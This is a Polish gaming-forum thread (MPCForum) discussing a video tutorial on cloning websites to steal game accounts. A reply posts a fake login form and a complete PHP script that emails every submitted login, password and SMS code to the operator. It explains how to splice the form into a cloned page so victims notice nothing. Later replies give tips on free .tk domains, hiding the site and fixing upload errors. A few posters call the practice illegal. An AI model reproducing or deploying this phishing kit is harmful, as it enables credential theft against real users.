Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

Wideo poradnik: Hakowanie kont po przez stronę / Klonowanie stron


S0NikX

Rekomendowane odpowiedzi

  • Odpowiedzi 114
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

Elegancko. Tyle ze teraz zrozumieją to dzieciaki, które nie powinny tego rozumieć, bo może byc porażka :( ale Się ceni prace :D

 

@Edit:

Jeśli mogę dodam coś od siebie ;)

 

Nie musimy zawsze wpisywać tego formularza!

 

 

<form name="formularz1"
action="21.php"
method="post"
<p>test dla mpc forum"<p> </p>
</p>
Login <input type="text" name="Login:"/><br>
<br>
Haslo<input type="password" name="Hasło" />
<p>Kod z SMS <input type="text" name="kod z sms:"/>
</p>
<p>
<td coslpan="2"><input type="submit" value="Wyslij"></td></p></form>

 

 

 

Każda z stron którą pobierzemy ma inny formularz, tzn. rodzaj, krój, wielkość, jest zawsze login i haslo (nie ma kodu z sms) więc możemy nasz skrypt podpiąć pod panel logowania ;)

 

Teraz jak to zrobić:

Wystarczy odnaleźć w naszym "index.html" linijek z z formularzem logowania, ja zwykle wpisuje w szukaj (ctrl+f) loguj/zaloguj i przed skryptem panelu logowania umieszczamy

<form name="formularz1"
action="21.php"
method="post"

po czym zamykamy:

</form>

 

Następnie cały skrypt z dodaną naszą edycje wklejamy do naszego 21.php w miejsce napisu "Tutaj umieść wszystkie pola formularza"

 

 

<?php
if (count($_POST))
{
////////// USTAWIENIA //////////
$email = '[email protected]'; // Adres e-mail adresata
$subject = 'Nowe konto '; // Temat listu
$message = 'Wyslano wiadomosc na email.'; // Komunikat
$error = 'Wystąpił błąd podczas wysyłania formularza'; // Komunikat błędu
$charset = 'iso-8859-2'; // Strona kodowa
//////////////////////////////
$head =
"MIME-Version: 1.0\r\n" .
"Content-Type: text/plain; charset=$charset\r\n" .
"Content-Transfer-Encoding: 8bit";
$body = '';
foreach ($_POST as $name => $value)
{
if (is_array($value))
{
for ($i = 0; $i < count($value); $i++)
{
$body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value[$i]) : $value[$i]) . "\r\n";
}
}
else $body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value) : $value) . "\r\n";
}
echo mail($email, "=?$charset?B?" . base64_encode($subject) . "?=", $body, $head) ? $message : $error;
}
else
{
?>
<form action="?" method="post">
Tutaj umieść wszystkie pola formularza
</form>
<?php
}
?>

 

 

 

Ps:

Ja kopiuje index.html i wrzucam przed cały skrypt (21.php) po to aby po kliknięciu zaloguj(pokazało normalnie stronę (tak jak by się nie zalogowało). Zero podejrzeń ze strony ofiar!

Opublikowano

Proponuję usunąć, bo zaraz wszyscy tego się nauczą i uodpornią się na to tak samo, jak na "klonowanie itemków" ;D

65339939328376711656.png

//nie podajem linkow poza mpc w sygnaturach

Opublikowano

Proszę mi yitian2 zostawić w spokoju!! :D Zrobiłem super stronę, dziennie kilkanaście pasow, a tu od dziś widzę jakieś nowe spamy, z lipnymi stronami... Walnięty skrypt byle jak i dawaj... I tak wam nikt nie wejdzie, a psujecie mi zarobek :(

Opublikowano

Tworzenie tego typu stron jest nielegalne i proszę mi uwierzyć, że mało kto się nabierze na domene .tk

 

Jeżeli chcecie wzbudzić zaufanie potencjalnej ofiary, to musicie wykupić domenę .pl gdzie musicie podać swoje dane osobowe - po kilku mailach możecie mieć nieciekawie na chacie.

Naprawdę nie polecam tego robić ;) Oczywiście zawsze można odpalić cebulkową przeglądarkę i over 9k proxy, ale czy warto zachodu dla srebrnego miecza +5 i tygrysiej +4? :D

 

Autor niepotrzebnie imo publikował to na forum, ponieważ teraz kretyni nie zdający sobie sprawy z grożących nieprzyjemności zaczną się bawić w hackerów :)

Dodatkowo prawie wszystkie hostingi gdy wykryją stronę która wygląda jak phishing nie bawią się, tylko leci ban.

Opublikowano

Tworzenie tego typu stron jest nielegalne i proszę mi uwierzyć, że mało kto się nabierze na domene .tk

 

Jeżeli chcecie wzbudzić zaufanie potencjalnej ofiary, to musicie wykupić domenę .pl gdzie musicie podać swoje dane osobowe - po kilku mailach możecie mieć nieciekawie na chacie.

Naprawdę nie polecam tego robić ;) Oczywiście zawsze można odpalić cebulkową przeglądarkę i over 9k proxy, ale czy warto zachodu dla srebrnego miecza +5 i tygrysiej +4? :D

 

Autor niepotrzebnie imo publikował to na forum, ponieważ teraz kretyni nie zdający sobie sprawy z grożących nieprzyjemności zaczną się bawić w hackerów :)

Dodatkowo prawie wszystkie hostingi gdy wykryją stronę która wygląda jak phishing nie bawią się, tylko leci ban.

nie strasz ludzi:) używałem tego długi czas i uwierz że na domenę .tk duzo osob sie nabiera:) robimy swoje gdy schodzimy z kompa wyłączamy stronę:) w każdej chwili mozna ją aktywować wszystko pokazane na filmie:)
0fiz5s7s0sea1k4fzfl.jpg
Opublikowano

Mam problem mianowicie wszystko ładnie , pięknie ale gdy naciskam wyslij pokazuje mi nową strone z errorem 404 ( Friko darmowe domeny ) i tyle. Robiłem stronę dla serwera xenoxmt2. Proszę o pomoc ;d

Opublikowano

Mam problem mianowicie wszystko ładnie , pięknie ale gdy naciskam wyslij pokazuje mi nową strone z errorem 404 ( Friko darmowe domeny ) i tyle. Robiłem stronę dla serwera xenoxmt2. Proszę o pomoc ;d

 

Nie wysłałeś za pewne pliku 21.php na serwer FTP gdy naciskasz wyślij odsyła cię do 21.php i jeżeli go nie masz pokazuje stronę friko

 

Działa mi to tylko za pierwszym razem, a potem wyskakuje że wystąpił błąd podczas wysyłania formularza. :/

 

Może coś przez przypadek edytowałeś w skryptach i błędy masz

 

 

A jezeli ktos to zglosi czy cos w tym stylu, jest to karane prawnie ?

 

Oczywiście jest to karalne ale wątpie aby ktokolwiek to zgłosił zawsze można stronę wyłączyć i nikt nic nie wie :)

0fiz5s7s0sea1k4fzfl.jpg
Opublikowano

a Gdzie ten plik 21.php trzeba wkleic ? bo stronke juz mam tylko passy na e-maila jeszcze musza przychodzic :P

 

Plik 21.php razem z innymi plikami na FTP (serwer / hosting ,który zakładałeś)

0fiz5s7s0sea1k4fzfl.jpg
Opublikowano

Może i dobry sposób, ale przez ten "sposób" ukradli mi konto!

Nie dam + ani - wstrzymam się.

"My World is in your Head..."

 

Pierwszy Polski blog o grze Vampyr:
http://www.czasnawampyr.pl/category/news/

 

 

Opublikowano

Może i dobry sposób, ale przez ten "sposób" ukradli mi konto!

Nie dam + ani - wstrzymam się.

 

To dzięki temu tutorialowi wiesz jak ukradli ci konto..^^

 

odświeżam :)

0fiz5s7s0sea1k4fzfl.jpg
Opublikowano

Jestem zachwycony tutorialem. Piekna oprawa video. Ladny z dykcja komentarz glosowy. Pokazane czytelnie jak wszystko zrobic. Mega wielki plus leci. Moze jutro zrobie cos takiego na razie na probe ;d Dobra robota,

sygnlamborginipro.png


Filmy z Metin2.PL Solar s26


Opublikowano

kurcze mam taki problem.

zarobiłem raz stronkę wrzuciłem ją na serwer i było oki a jak zrobiłem se juz taką na serio to filezilla nie chce się połączyć

Status: Znajdowanie adresu IP dla ftp.friko.pl

Status: Łączenie z ************...

Status: Połączenie nawiązanie, oczekiwanie na wiadomość powitalną...

Odpowiedź 220 ProFTPD 1.3.1 Serv*************

Polecenie: USER ************

Odpowiedź 331 Password required for *******

Polecenie: PASS ********

Odpowiedź 530 Login incorrect.

Błąd: Błąd krytyczny

Błąd: Nie można połączyć się z serwerem

 

 

co jest grane ? próbuje juz od 2 dni...dane są na 100% prawidłowe

reklama

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...